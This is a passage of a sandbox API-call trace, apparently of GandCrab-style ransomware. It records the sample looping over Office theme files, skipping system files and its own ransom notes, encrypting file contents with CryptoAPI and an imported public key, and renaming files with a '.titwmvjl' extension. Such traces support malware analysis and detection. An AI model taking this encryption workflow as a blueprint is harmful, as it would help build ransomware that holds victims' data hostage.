lstrcmpiW (lpString1="TM04033929[[fn=Slate]].thmx", lpString2="boot.ini") returned 1 [0076.957] lstrcmpiW (lpString1="TM04033929[[fn=Slate]].thmx", lpString2="ntuser.dat.log") returned 1 [0076.957] lstrcmpiW (lpString1="TM04033929[[fn=Slate]].thmx", lpString2="thumbs.db") returned 1 [0076.957] lstrcmpiW (lpString1="TM04033929[[fn=Slate]].thmx", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0076.957] lstrcmpiW (lpString1="TM04033929[[fn=Slate]].thmx", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0076.957] lstrcmpiW (lpString1="TM04033929[[fn=Slate]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0076.957] lstrcmpiW (lpString1="TM04033929[[fn=Slate]].thmx", lpString2="CRAB-DECRYPT.html") returned 1 [0076.957] lstrcmpiW (lpString1="TM04033929[[fn=Slate]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0076.957] lstrcmpiW (lpString1="TM04033929[[fn=Slate]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0076.957] lstrcmpiW (lpString1="TM04033929[[fn=Slate]].thmx", lpString2="ntldr") returned 1 [0076.957] lstrcmpiW (lpString1="TM04033929[[fn=Slate]].thmx", lpString2="NTDETECT.COM") returned 1 [0076.957] lstrcmpiW (lpString1="TM04033929[[fn=Slate]].thmx", lpString2="Bootfont.bin") returned 1 [0076.957] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033929[[fn=Slate]].thmx") returned 129 [0076.957] lstrlenW (lpString=".thmx") returned 5 [0076.957] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0076.957] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".thmx ") returned 6 [0076.957] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.957] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0076.958] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033929[[fn=Slate]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033929[[fn=slate]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0076.958] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.958] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0076.965] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.965] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.966] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0076.966] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0076.966] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0076.966] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0076.966] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0076.967] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.967] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0076.967] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.967] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.967] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0076.967] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0076.968] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0076.968] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0076.968] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0076.968] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.968] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0076.968] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.968] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.968] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0076.969] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.969] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503438) returned 1 [0076.969] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.969] CryptGetKeyParam (in: hKey=0x503438, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0076.969] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.969] CryptEncrypt (in: hKey=0x503438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0076.970] GetLastError () returned 0x0 [0076.970] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.970] CryptDestroyKey (hKey=0x503438) returned 1 [0076.970] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.970] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0076.970] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.970] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0076.971] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.971] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503738) returned 1 [0076.971] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.971] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0076.971] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.971] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0076.971] GetLastError () returned 0x0 [0076.971] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.972] CryptDestroyKey (hKey=0x503738) returned 1 [0076.972] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.972] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0076.972] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0076.972] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0076.972] ReadFile (in: hFile=0x2ec, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259dfd0*=0x100000, lpOverlapped=0x0) returned 1 [0077.027] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.027] WriteFile (in: hFile=0x2ec, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259dfb4*=0x100000, lpOverlapped=0x0) returned 1 [0077.036] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.037] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0077.038] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.043] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.047] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.047] CloseHandle (hObject=0x2ec) returned 1 [0077.109] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033929[[fn=Slate]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033929[[fn=slate]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033929[[fn=Slate]].thmx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033929[[fn=slate]].thmx.titwmvjl"), dwFlags=0x1) returned 1 [0077.109] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.110] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0077.110] lstrcmpW (lpString1="TM04033937[[fn=Vapor Trail]].thmx", lpString2=".") returned 1 [0077.110] lstrcmpW (lpString1="TM04033937[[fn=Vapor Trail]].thmx", lpString2="..") returned 1 [0077.110] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM04033937[[fn=Vapor Trail]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033937[[fn=Vapor Trail]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033937[[fn=Vapor Trail]].thmx" [0077.110] lstrlenW (lpString=".titwmvjl") returned 9 [0077.110] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033937[[fn=Vapor Trail]].thmx") returned 135 [0077.110] VirtualAlloc (lpAddress=0x0, dwSize=0x14e, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0077.110] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033937[[fn=Vapor Trail]].thmx.titwmvjl") returned 144 [0077.110] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033937[[fn=Vapor Trail]].thmx") returned 135 [0077.110] lstrlenW (lpString=".thmx") returned 5 [0077.110] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0077.110] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".thmx ") returned 6 [0077.110] lstrcmpiW (lpString1=".thmx", lpString2=".titwmvjl") returned -1 [0077.110] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.111] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033937[[fn=Vapor Trail]].thmx") returned 135 [0077.111] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033937[[fn=Vapor Trail]].thmx") returned 135 [0077.111] lstrcmpiW (lpString1="TM04033937[[fn=Vapor Trail]].thmx", lpString2="desktop.ini") returned 1 [0077.111] lstrcmpiW (lpString1="TM04033937[[fn=Vapor Trail]].thmx", lpString2="autorun.inf") returned 1 [0077.111] lstrcmpiW (lpString1="TM04033937[[fn=Vapor Trail]].thmx", lpString2="ntuser.dat") returned 1 [0077.111] lstrcmpiW (lpString1="TM04033937[[fn=Vapor Trail]].thmx", lpString2="iconcache.db") returned 1 [0077.111] lstrcmpiW (lpString1="TM04033937[[fn=Vapor Trail]].thmx", lpString2="bootsect.bak") returned 1 [0077.111] lstrcmpiW (lpString1="TM04033937[[fn=Vapor Trail]].thmx", lpString2="boot.ini") returned 1 [0077.111] lstrcmpiW (lpString1="TM04033937[[fn=Vapor Trail]].thmx", lpString2="ntuser.dat.log") returned 1 [0077.111] lstrcmpiW (lpString1="TM04033937[[fn=Vapor Trail]].thmx", lpString2="thumbs.db") returned 1 [0077.111] lstrcmpiW (lpString1="TM04033937[[fn=Vapor Trail]].thmx", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0077.111] lstrcmpiW (lpString1="TM04033937[[fn=Vapor Trail]].thmx", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0077.111] lstrcmpiW (lpString1="TM04033937[[fn=Vapor Trail]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0077.111] lstrcmpiW (lpString1="TM04033937[[fn=Vapor Trail]].thmx", lpString2="CRAB-DECRYPT.html") returned 1 [0077.111] lstrcmpiW (lpString1="TM04033937[[fn=Vapor Trail]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0077.111] lstrcmpiW (lpString1="TM04033937[[fn=Vapor Trail]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0077.111] lstrcmpiW (lpString1="TM04033937[[fn=Vapor Trail]].thmx", lpString2="ntldr") returned 1 [0077.111] lstrcmpiW (lpString1="TM04033937[[fn=Vapor Trail]].thmx", lpString2="NTDETECT.COM") returned 1 [0077.111] lstrcmpiW (lpString1="TM04033937[[fn=Vapor Trail]].thmx", lpString2="Bootfont.bin") returned 1 [0077.111] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033937[[fn=Vapor Trail]].thmx") returned 135 [0077.111] lstrlenW (lpString=".thmx") returned 5 [0077.111] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0077.111] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".thmx ") returned 6 [0077.111] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.111] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0077.112] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033937[[fn=Vapor Trail]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033937[[fn=vapor trail]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0077.112] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.112] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0077.117] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.118] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.118] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0077.118] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0077.118] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0077.118] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0077.118] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0077.118] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.119] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0077.119] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.119] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.119] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0077.119] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0077.119] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0077.120] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0077.120] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0077.120] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.120] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0077.120] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.120] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.120] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0077.120] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.121] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5035b8) returned 1 [0077.121] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.121] CryptGetKeyParam (in: hKey=0x5035b8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0077.121] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.121] CryptEncrypt (in: hKey=0x5035b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0077.121] GetLastError () returned 0x0 [0077.121] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.121] CryptDestroyKey (hKey=0x5035b8) returned 1 [0077.121] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.122] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0077.122] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.122] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0077.122] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.122] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5037f8) returned 1 [0077.122] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.122] CryptGetKeyParam (in: hKey=0x5037f8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0077.122] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.123] CryptEncrypt (in: hKey=0x5037f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0077.123] GetLastError () returned 0x0 [0077.123] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.123] CryptDestroyKey (hKey=0x5037f8) returned 1 [0077.123] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.123] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0077.123] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0077.123] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0077.124] ReadFile (in: hFile=0x2ec, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259dfd0*=0x100000, lpOverlapped=0x0) returned 1 [0077.178] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.178] WriteFile (in: hFile=0x2ec, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259dfb4*=0x100000, lpOverlapped=0x0) returned 1 [0077.187] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.187] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0077.188] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.192] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.196] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.196] CloseHandle (hObject=0x2ec) returned 1 [0077.303] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033937[[fn=Vapor Trail]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033937[[fn=vapor trail]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033937[[fn=Vapor Trail]].thmx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033937[[fn=vapor trail]].thmx.titwmvjl"), dwFlags=0x1) returned 1 [0077.304] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.304] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0077.304] lstrcmpW (lpString1="TM10001103[[fn=Headlines]].thmx", lpString2=".") returned 1 [0077.304] lstrcmpW (lpString1="TM10001103[[fn=Headlines]].thmx", lpString2="..") returned 1 [0077.304] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM10001103[[fn=Headlines]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001103[[fn=Headlines]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001103[[fn=Headlines]].thmx" [0077.304] lstrlenW (lpString=".titwmvjl") returned 9 [0077.304] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001103[[fn=Headlines]].thmx") returned 133 [0077.304] VirtualAlloc (lpAddress=0x0, dwSize=0x14a, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0077.305] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001103[[fn=Headlines]].thmx.titwmvjl") returned 142 [0077.305] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001103[[fn=Headlines]].thmx") returned 133 [0077.305] lstrlenW (lpString=".thmx") returned 5 [0077.305] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0077.305] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".thmx ") returned 6 [0077.305] lstrcmpiW (lpString1=".thmx", lpString2=".titwmvjl") returned -1 [0077.305] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.305] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001103[[fn=Headlines]].thmx") returned 133 [0077.305] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001103[[fn=Headlines]].thmx") returned 133 [0077.305] lstrcmpiW (lpString1="TM10001103[[fn=Headlines]].thmx", lpString2="desktop.ini") returned 1 [0077.305] lstrcmpiW (lpString1="TM10001103[[fn=Headlines]].thmx", lpString2="autorun.inf") returned 1 [0077.305] lstrcmpiW (lpString1="TM10001103[[fn=Headlines]].thmx", lpString2="ntuser.dat") returned 1 [0077.305] lstrcmpiW (lpString1="TM10001103[[fn=Headlines]].thmx", lpString2="iconcache.db") returned 1 [0077.306] lstrcmpiW (lpString1="TM10001103[[fn=Headlines]].thmx", 